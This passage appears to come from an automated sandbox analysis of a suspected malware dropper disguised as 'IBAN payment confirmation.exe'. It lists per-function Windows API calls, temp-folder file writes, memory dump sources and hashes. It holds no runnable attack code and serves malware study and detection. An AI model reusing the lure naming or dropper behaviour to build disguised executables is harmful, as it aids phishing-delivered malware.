                                                                                                                              • Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                              • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                              APIs
                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                              • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                              • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                              • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                              • String ID: CB@$Call$N$open
                                                                                                                              • API String ID: 3615053054-4184941720
                                                                                                                              • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                              • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                              • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                              • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                              APIs
                                                                                                                              • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                              • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                              • wsprintfA.USER32 ref: 00405C80
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                              • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                              • API String ID: 1265525490-3322868524
                                                                                                                              • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                              • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                              • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                              • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                              • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                              • String ID: F
                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                              • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                              • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                              • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                              • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                                              • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                                              • String ID: @H3w
                                                                                                                              • API String ID: 3579998418-4275297014
                                                                                                                              • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                              • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                              • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                              • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                              • String ID: "C:\Users\user\Desktop\IBAN payment confirmation.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                              • API String ID: 589700163-3648141534
                                                                                                                              • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                              • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                              • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                              • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                              • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp$C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll
                                                                                                                              • API String ID: 1453599865-1295156676
                                                                                                                              • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                              • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                              • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                              • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                              • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                              • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                              • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2320649405-0
                                                                                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                              • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                              • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3294113728-0
                                                                                                                              • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                              • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                              • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                              • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                              • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                              • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                              • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2531174081-0
                                                                                                                              • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                              • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                              • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                              • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                              • wsprintfW.USER32 ref: 00402D81
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
